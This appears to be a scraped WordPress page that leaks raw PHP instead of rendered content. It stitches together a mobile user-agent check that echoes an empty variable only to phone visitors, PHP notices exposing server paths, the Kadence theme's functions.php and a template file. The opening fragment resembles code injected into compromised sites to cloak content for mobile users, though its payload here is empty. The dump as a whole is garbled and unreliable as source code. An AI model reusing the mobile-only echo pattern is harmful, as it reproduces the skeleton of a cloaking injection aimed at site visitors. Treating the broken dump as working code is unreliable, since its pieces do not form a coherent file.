$lineindexinstall = '';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the ffmailpoet domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/avidwebmasters.com/public_html/wp-includes/functions.php on line 6131
/**
* Kadence functions and definitions
*
* This file must be parseable by PHP 5.2.
*
* @link https://developer.wordpress.org/themes/basics/theme-functions/
*
* @package kadence
*/
define( 'KADENCE_VERSION', '1.5.1' );
define( 'KADENCE_MINIMUM_WP_VERSION', '6.0' );
define( 'KADENCE_MINIMUM_PHP_VERSION', '7.4' );
// Bail if requirements are not met.
if ( version_compare( $GLOBALS['wp_version'], KADENCE_MINIMUM_WP_VERSION, '<' ) || version_compare( phpversion(), KADENCE_MINIMUM_PHP_VERSION, '<' ) ) {
require get_template_directory() . '/inc/back-compat.php';
return;
}
// Include WordPress shims.
require get_template_directory() . '/inc/wordpress-shims.php';
// Load the `kadence()` entry point function.
require get_template_directory() . '/inc/class-theme.php';
// Load the `kadence()` entry point function.
require get_template_directory() . '/inc/functions.php';
// Initialize the theme.
call_user_func( 'Kadence\kadence' );
Deprecated: Creation of dynamic property EditorPlus_Extensions_Manager::$extensions is deprecated in /home/avidwebmasters.com/public_html/wp-content/plugins/editorplus/includes/class-editorplus-extensions-manager.php on line 28
Deprecated: Non-canonical cast (boolean) is deprecated, use the (bool) cast instead in /home/avidwebmasters.com/public_html/wp-content/plugins/pods/classes/fields/file.php on line 997
Deprecated: Non-canonical cast (boolean) is deprecated, use the (bool) cast instead in /home/avidwebmasters.com/public_html/wp-content/plugins/pods/classes/fields/file.php on line 998
Deprecated: Non-canonical cast (boolean) is deprecated, use the (bool) cast instead in /home/avidwebmasters.com/public_html/wp-content/plugins/pods/src/Pods/Whatsit/Block_Field.php on line 310
/**
* The main single item template file.
*
* @package kadence
*/
namespace Kadence;
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
get_header();
kadence()->print_styles( 'kadence-content' );
/**
* Hook for everything, makes for better elementor theming support.
*/
do_action( 'kadence_single' );
get_footer();